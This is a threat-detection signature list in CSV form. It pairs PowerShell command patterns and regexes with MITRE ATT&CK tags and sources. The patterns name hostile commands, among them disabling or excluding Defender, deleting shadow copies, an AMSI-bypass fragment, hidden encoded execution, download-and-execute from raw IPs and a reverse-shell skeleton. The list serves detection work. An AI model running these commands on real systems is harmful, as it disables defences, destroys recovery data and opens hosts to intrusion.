"*\powershell.exe* +=hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\+\=hidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with  powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*\powershell.exe* = hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\=\shidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with  powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*\powershell.exe* =hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\=hidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file.  It can be performed with  powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*Add-DnsClientDohServerAddress *-ServerAddress *",".{0,1000}Add\-DnsClientDohServerAddress\s.{0,1000}\-ServerAddress\s.{0,1000}","greyware_tool_keyword","powershell","adding a DNS over HTTPS server with powershell","T1568.003 - T1049 - T1562.001","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientdohserveraddress?view=windowsserver2022-ps","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force*",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s\@\(\$env\:UserProfile,\s\$env\:ProgramData\)\s\-ExclusionExtension\s\'\.exe\'\s\-Force.{0,1000}","greyware_tool_keyword","powershell","add exclusions for defender","T1489","TA0005","N/A","N/A","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*",".{0,1000}Add\-MpPreference\s\-ExclusionProcess\s.{0,1000}\\Windows\\System32\\WindowsPowerShell\\v1\.0\\powershell\.exe.{0,1000}","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*",".{0,1000}Add\-PswaAuthorizationRule\s\-UsernName\s\\.{0,1000}\s\-ComputerName\s\\.{0,1000}\s\-ConfigurationName\s\\.{0,1000}","greyware_tool_keyword","powershell","allows all users to access all computers with a specified configuration","T1053","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*Add-WindowsCapability -Online -Name OpenSSH.Server*",".{0,1000}Add\-WindowsCapability\s\-Online\s\-Name\sOpenSSH\.Server.{0,1000}","greyware_tool_keyword","powershell","install openssh server (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*",".{0,1000}Clear\-RecycleBin\s\-Force\s\-ErrorAction\sSilentlyContinue.{0,1000}","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","8","751","265","2024-08-12T21:40:40Z","2021-09-08T20:33:18Z"
"*cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *","cmd\.exe\s\/c\sPowerShell\.exe\s\-Exec\sByPass\s\-Nol\s\-Enc\s.{0,1000}","greyware_tool_keyword","powershell","Jenkins Abuse Without admin access","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*copy-item *\roaming\microsoft\windows\start menu\programs\startup*",".{0,1000}copy\-item\s.{0,1000}\\roaming\\microsoft\\windows\\start\smenu\\programs\\startup.{0,1000}","greyware_tool_keyword","powershell","Copy file to startup via Powershell","T1050 - T1106 - T1547.009","TA0003 - TA0005 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*enable-psremoting -force*",".{0,1000}enable\-psremoting\s\-force.{0,1000}","greyware_tool_keyword","powershell","enables WinRM","T1077 - T1021","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","10","10","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z"
"*Find-LocalAdminAccess -Verbose*",".{0,1000}Find\-LocalAdminAccess\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Find machine where the user has admin privs","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*gci env:USERNAME*",".{0,1000}gci\senv\:USERNAME.{0,1000}","greyware_tool_keyword","powershell","alternativeto whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A"
"*gci -h C:\pagefile.sys*",".{0,1000}gci\s\-h\sC\:\\pagefile\.sys.{0,1000}","greyware_tool_keyword","powershell","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*Get-ADComputer -Filter {TrustedForDelegation -eq $True}*","Get\-ADComputer\s\-Filter\s\{TrustedForDelegation\s\-eq\s\$True\}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-ADGroup -Filter *Name -like *admin*","Get\-ADGroup\s\-Filter\s.{0,1000}Name\s\-like\s.{0,1000}admin.{0,1000}","greyware_tool_keyword","powershell","AD Module Search for a particular string in attributes (admin)","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*","Get\-ADObject\s\-Filter\s\{msDS\-AllowedToDelegateTo\s.{0,1000}\s\-Properties\smsDS\-AllowedToDelegateTo.{0,1000}","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select *msDS-ShadowPrincipalSid*","Get\-ADObject\s\-SearchBase\s.{0,1000}CN\=Shadow\sPrincipal\sConfiguration.{0,1000}CN\=Services.{0,1000}\s\(Get\-ADRootDSE\)\.configurationNamingContext\)\s\|\sselect\s.{0,1000}msDS\-ShadowPrincipalSid.{0,1000}","greyware_tool_keyword","powershell","Enumerate shadow security principals mapped to a high priv group","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth*","Get\-ADUser\s\-Filter\s\{DoesNotRequirePreAuth\s\-eq\s\$True\}\s\-Properties\sDoesNotRequirePreAuth","greyware_tool_keyword","powershell","AD module Enumerate users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-ADUser -Filter {TrustedForDelegation -eq $True}*","Get\-ADUser\s\-Filter\s\{TrustedForDelegation\s\-eq\s\$True\}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-AppLockerPolicy -Effective *",".{0,1000}Get\-AppLockerPolicy\s\-Effective\s.{0,1000}","greyware_tool_keyword","powershell","AppLocker Get AppLocker policy","T1592","TA0043","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","7","8","N/A","N/A","N/A","N/A"
"*Get-DhcpServerv4Scope | Set-DhcpServerv4OptionValue -DnsServer *",".{0,1000}Get\-DhcpServerv4Scope\s\|\sSet\-DhcpServerv4OptionValue\s\-DnsServer\s.{0,1000}","greyware_tool_keyword","powershell","set the DNS server configuration","T1557 - T1584","TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*Get-DomainComputer -TrustedToAuth*","Get\-DomainComputer\s\-TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-DomainUser -KerberosPreuthNotRequired -Verbose*",".{0,1000}Get\-DomainUser\s\-KerberosPreuthNotRequired\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Powerview Enumerate users","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-GPO -All*","Get\-GPO\s\-All","greyware_tool_keyword","powershell","AD Module GroupPolicy - List of GPO in the domain","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-LoggedonLocal -ComputerName *",".{0,1000}Get\-LoggedonLocal\s\-ComputerName\s.{0,1000}","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-MpComputerStatus*",".{0,1000}Get\-MpComputerStatus.{0,1000}","greyware_tool_keyword","powershell","Gets the status of antimalware software on the computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Get-MpPreference | Select-Object -ExpandProperty ExclusionPath*",".{0,1000}Get\-MpPreference\s\|\sSelect\-Object\s\-ExpandProperty\sExclusionPath.{0,1000}","greyware_tool_keyword","powershell","get defender AV exclusions","T1059.003 - T1202 - T1212","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A"
"*Get-NetGroup -FullData*","Get\-NetGroup\s\-FullData.{0,1000}","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-NetGroupMember -GroupName *DNSAdmins*",".{0,1000}Get\-NetGroupMember\s\-GroupName\s.{0,1000}DNSAdmins.{0,1000}","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or Lateral Movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","greyware tool - risks of False positive !","7","8","N/A","N/A","N/A","N/A"
"*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Get-WmiObject Win32_ShadowCopy | Remove-WmiObject*",".{0,1000}Get\-WmiObject\sWin32_ShadowCopy\s\|\sRemove\-WmiObject.{0,1000}","greyware_tool_keyword","powershell","delete shadow copies","T1490 - T1562.002","TA0040 - TA0007","N/A","N/A","Defense Evasion","https://rexorvc0.com/2024/06/19/Akira-The-Old-New-Style-Crime/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Invoke-EnumerateLocalAdmin -Verbose*",".{0,1000}Invoke\-EnumerateLocalAdmin\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Invoke-UserHunter -CheckAccess*",".{0,1000}Invoke\-UserHunter\s\-CheckAccess.{0,1000}","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Invoke-WebRequest ifconfig.me/ip*Content.Trim()",".{0,1000}Invoke\-WebRequest\sifconfig\.me\/ip.{0,1000}Content\.Trim\(\)","greyware_tool_keyword","powershell","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","47","15","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
"*ls env:USERNAME*",".{0,1000}ls\senv\:USERNAME.{0,1000}","greyware_tool_keyword","powershell","alternativeto whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A"
"*New-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"" -Name * -Value 0 -PropertyType Dword*",".{0,1000}New\-ItemProperty\s\-Path\s\""HKLM\:\\Software\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\""\s\-Name\s.{0,1000}\s\-Value\s0\s\-PropertyType\sDword.{0,1000}","greyware_tool_keyword","powershell","hiding a user from the login screen by modifying a specific registry key","T1112 - T1564.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*New-NetFirewallRule * -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22*",".{0,1000}New\-NetFirewallRule\s.{0,1000}\s\-Enabled\sTrue\s\-Direction\sInbound\s\-Protocol\sTCP\s\-Action\sAllow\s\-LocalPort\s22.{0,1000}","greyware_tool_keyword","powershell","allowing SSH incoming connections (critical on DC)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*",".{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(.{0,1000}\$stream\s\=\s\$client\.GetStream\(\).{0,1000}\[byte\[\]\]\$bytes\s\=\s0\.\.65535.{0,1000}","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*powershell ?encodedcommand $env:PSExecutionPolicyPreference=""bypass""*",".{0,1000}powershell\s?encodedcommand\s\$env\:PSExecutionPolicyPreference\=\""bypass\"".{0,1000}","greyware_tool_keyword","powershell","Execution Policy Bypass evasion","T1059.001 - T1202 - T1480","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*",".{0,1000}powershell\s\-c\s.{0,1000}\\windows\\system32\\inetsrv\\appcmd\.exe\slist\sapppool\s\/\@t\:.{0,1000}","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","Checking For Hidden Credentials With Appcmd.exe","10","10","2773","295","2024-08-29T22:58:18Z","2023-09-08T15:36:00Z"
"*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*",".{0,1000}powershell\sNew\-ItemProperty\s\-Path\s.{0,1000}HKLM\:\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\-Name\sDisableAntiSpyware\s\-Value\s1\s\-PropertyType\sDWORD\s\-Force.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*powershell Uninstall-WindowsFeature -Name Windows-Defender*",".{0,1000}powershell\sUninstall\-WindowsFeature\s\-Name\sWindows\-Defender.{0,1000}","greyware_tool_keyword","powershell","uninstalls Windows Defender","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*",".{0,1000}powershell.{0,1000}Uninstall\-WindowsFeature\s\-Name\sWindows\-Defender\-GUI.{0,1000}","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*Powershell.exe  -windowstyle hidden -nop -ExecutionPolicy Bypass  -Commmand *C:\Users\*\AppData\Roaming\*",".{0,1000}Powershell\.exe\s\s\-windowstyle\shidden\s\-nop\s\-ExecutionPolicy\sBypass\s\s\-Commmand\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\.{0,1000}","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*powershell.exe curl http://[0-9]{1,3}*",".{0,1000}powershell.+curl\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A"
"*powershell.exe -exec bypass -noni -nop -w 1 -C*",".{0,1000}powershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C.{0,1000}","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","High risk of false positive","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z"
"*powershell.exe -exec bypass -noni -nop -w 1 -C*invoke_obfuscation*",".{0,1000}powershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C.{0,1000}invoke_obfuscation.{0,1000}","greyware_tool_keyword","powershell","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z"
"*powershell.exe Invoke-WebRequest http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+Invoke\-WebRequest\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A"
"*powershell.exe iwr http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+iwr\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A"
"*powershell.exe -noni -nop -w 1 -enc *",".{0,1000}powershell\.exe\s\-noni\s\-nop\s\-w\s1\s\-enc\s.{0,1000}","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","High risk of false positive","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z"
"*powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc *",".{0,1000}powershell\.exe\s\-NoP\s\-NoL\s\-sta\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Enc\s.{0,1000}","greyware_tool_keyword","powershell","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","N/A","10","8325","1637","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z"
"*powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://[0-9]{1,3}*",".{0,1000}powershell.+\s-nop\s-w\shidden\s-c\s\""IEX\s\(\(new\-object net\.webclient\)\.downloadstring\(\'http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A"
"*powershell.exe wget http://[0-9]{1,3}*",".{0,1000}powershell\.exe\s+wget\s+http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}(\/|\:).{0,1000}","greyware_tool_keyword","powershell","downloading from IP without domain name","T1105","TA0009","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","only the regex part matters","6","10","N/A","N/A","N/A","N/A"
"*reg delete * /v MRUList /f*",".{0,1000}reg\sdelete\s.{0,1000}\s\/v\sMRUList\s\/f.{0,1000}","greyware_tool_keyword","powershell","attempts to evade defenses or remove traces of activity by deleting MRUList registry keys","T1012 - T1070 - T1485 - T1146","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*Remove-ItemProperty -Path* -Name MRUList *",".{0,1000}Remove\-ItemProperty\s\-Path.{0,1000}\s\-Name\sMRUList\s.{0,1000}","greyware_tool_keyword","powershell","attempts to evade defenses or remove traces of activity by deleting MRUList registry keys","T1012 - T1070 - T1485 - T1146","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*root/SecurityCenter2* -ClassName AntiVirusProduct*",".{0,1000}root\/SecurityCenter2.{0,1000}\s\-ClassName\sAntiVirusProduct.{0,1000}","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')*",".{0,1000}S\`eT\-It\`em\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\(\'blE\:1\'\+\'q2\'\).{0,1000}","greyware_tool_keyword","powershell","AMSI bypass obfuscation pattern","T1059.001 - T1562.001 - T1027.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*Set-ADObject -SamAccountName * -PropertyName scriptpath -PropertyValue *\*.exe*","Set\-ADObject\s\-SamAccountName\s.{0,1000}\s\-PropertyName\sscriptpath\s\-PropertyValue\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","powershell","AD module Logon Script from remote IP","T1037.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A"
"*Set-Clipboard -Value ' '*",".{0,1000}Set\-Clipboard\s\-Value\s\'\s\'.{0,1000}","greyware_tool_keyword","powershell","Clearing the clipboard is a deliberate attempt to cover tracks and make the attack less detectable","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","10","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z"
"*Set-Clipboard -Value ''*",".{0,1000}Set\-Clipboard\s\-Value\s\'\'.{0,1000}","greyware_tool_keyword","powershell","Clearing the clipboard is a deliberate attempt to cover tracks and make the attack less detectable","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","10","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z"
"*Set-MPPreference -DisableIntrusionPreventionSystem $true*",".{0,1000}Set\-MPPreference\s\-DisableIntrusionPreventionSystem\s\$true.{0,1000}","greyware_tool_keyword","powershell","Disable IPS","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
